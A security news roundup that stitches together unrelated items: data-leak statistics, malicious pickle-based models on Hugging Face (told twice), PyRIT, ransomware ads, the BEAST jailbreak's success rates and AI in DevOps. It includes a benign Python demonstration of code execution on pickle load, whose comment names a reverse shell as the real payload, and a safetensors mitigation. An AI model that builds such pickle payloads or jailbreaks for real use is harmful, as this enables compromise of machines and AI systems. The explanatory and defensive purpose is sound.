Security News
While 99% of companies have data protection solutions in place, 78% of cybersecurity leaders admit they've still had sensitive data breached, leaked, or exposed. "Today, data is highly portable. While AI and cloud technologies are igniting new business ventures that allow employees to connect, create, and collaborate, they also make it easier to leak critical corporate data like source code and IP," said Joe Payne, CEO of Code42.
As many as 100 malicious artificial intelligence (AI)/machine learning (ML) models have been discovered on the Hugging Face platform. These include instances where loading a pickle file leads to code execution on the machine that loads it.
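The underlying mechanism is worth illustrating. The sketch below is not one of the payloads found on Hugging Face; it is a minimal, harmless example of how Python's pickle protocol lets an object schedule an arbitrary callable (here a benign `os.system` echo) that runs the moment a file is deserialized. The `NotAModel` class and `model.bin` filename are illustrative placeholders.

```python
import pickle


class NotAModel:
    """Illustrative payload: pickle records the callable returned by
    __reduce__ during serialization, and that callable is invoked
    when the file is later unpickled."""

    def __reduce__(self):
        import os
        # Harmless stand-in for an attacker's command (e.g., a reverse shell).
        return (os.system, ("echo 'code ran during pickle load'",))


# "Attacker" side: serialize the object into what looks like a model file.
with open("model.bin", "wb") as f:
    pickle.dump(NotAModel(), f)

# "Victim" side: simply loading the file executes the embedded command.
with open("model.bin", "rb") as f:
    pickle.load(f)
```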
The Python Risk Identification Tool (PyRIT) is Microsoft's open-source automation framework that enables security professionals and machine learning engineers to find risks in generative AI systems. It started as a collection of individual scripts used during the team's initial foray into red teaming generative AI systems in 2022.
Group-IB found these compromised credentials in the logs of information-stealing malware traded on illicit dark web marketplaces. Throughout the reporting period, Group-IB experts uncovered 27 new advertisements for ransomware-as-a-service programs on dark web forums, including well-known groups such as Qilin, as well as other collectives that have yet to be seen in the wild.
Eficode research indicates that 96% of developers use AI tools, with most coders bypassing security policies to use them. With no standardized AI tool regulations in place, researchers advocate for stronger governance frameworks and AI security policies in organizations' DevOps strategies to address the challenges and opportunities AI presents.
Brave Software is the latest company to jump into AI, announcing that its new privacy-preserving AI assistant, "Leo," is rolling out on the Android version of its browser with the latest release, version 1.63. Brave says its AI assistant stands out for its ability to provide high-quality, relevant answers with fewer errors, thanks to its use of several advanced large language models, including Mixtral 8x7B, Claude Instant, and Llama 2 13B, with Mixtral set as the default for its multilingual capabilities and superior performance.
As early as 2018, the powerful foundation models powering cutting-edge applications like chatbots were being called "Frontier AI." In previous decades, the internet itself was considered an electronic frontier. Turner grappled with some of the negative consequences and contradictions of the frontier ethic and how it shaped American democracy.
"[I]n just one minute per prompt, we get an attack success rate of 89 percent on jailbreaking Vicuna-7B- v1.5, while the best baseline method achieves 46 percent," the authors state in their paper. "BEAST can attack a model as long as the model's token probability scores from the final network layer can be accessed. OpenAI is planning on making this available. Therefore, we can technically attack publicly available models if their token probability scores are available."
At least 100 instances of malicious AI/ML models were found on the Hugging Face platform, some of which can execute code on a victim's machine, giving attackers a persistent backdoor. JFrog's security team found that roughly a hundred models hosted on the platform contain malicious functionality, posing a significant risk of data breaches and espionage attacks.
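On the defensive side, one common mitigation is to avoid pickle-based checkpoint formats entirely. The sketch below assumes a weights file named "model.safetensors" exists on disk; the safetensors format stores raw tensors with no executable deserialization step.

```python
# Load weights from safetensors instead of a pickle-based .bin/.pt checkpoint.
from safetensors.torch import load_file

state_dict = load_file("model.safetensors")  # dict of parameter name -> torch.Tensor
print(list(state_dict)[:5])

# If a pickle-based checkpoint is unavoidable, newer PyTorch versions can
# restrict unpickling to plain tensor data:
# import torch
# state_dict = torch.load("model.bin", weights_only=True)
```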
In this Help Net Security interview, Itamar Friedman, CEO of Codium AI, discusses the integration of AI into DevOps practices and its impact on software development processes, particularly in automating code review, ensuring compliance, and improving efficiency. How is AI integrated into DevOps practices, and what are the most significant changes you've observed in software development processes?